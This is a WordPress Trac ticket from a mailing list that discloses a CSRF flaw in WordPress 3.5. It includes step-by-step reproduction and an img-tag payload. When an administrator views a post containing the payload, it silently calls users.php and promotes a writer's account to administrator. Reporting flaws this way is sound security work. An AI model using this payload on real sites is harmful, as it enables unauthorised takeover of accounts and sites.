[wp-trac] [WordPress Trac] #23004: Editor CSRF vulnerabilities discovered
WordPress Trac
noreply at wordpress.org
Wed Dec 19 12:55:48 UTC 2012
#23004: Editor CSRF vulnerabilities discovered
-----------------------------+--------------------------
Reporter: drssay | Type: defect (bug)
Status: new | Priority: normal
Milestone: Awaiting Review | Component: General
Version: 3.5 | Severity: critical
Keywords: |
-----------------------------+--------------------------
Reproduce
1. Login as a user with writer(or editor) privileges.
-> example) user name "test", user id = 2
2. Input syntax visual editor below.
{{{
<img src="http://localhost/wp-
admin/users.php?s=&_wponce=7258002722&_wp_http_referer=%2Fwp-
admin%2Fusers.php%3Fupdate%3Dpromote&action=-1&new_role=administrator&changeit=%EB%B3%80%EA%B2%BD&paged=1&users%5B%5D=2&action2=-1"
alt="" />
}}}
Parameters passed to the user number ''' users%5B%5D=2 '''
3. Login as a user with administrator privileges.
-> example) username "admin", user id 1
4. user "admin" view post written in step 2.
5. user "admin" can check the xbox image
6. user "test" to gain administrator privileges
Attachments will be added
--
Ticket URL: <http://core.trac.wordpress.org/ticket/23004>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list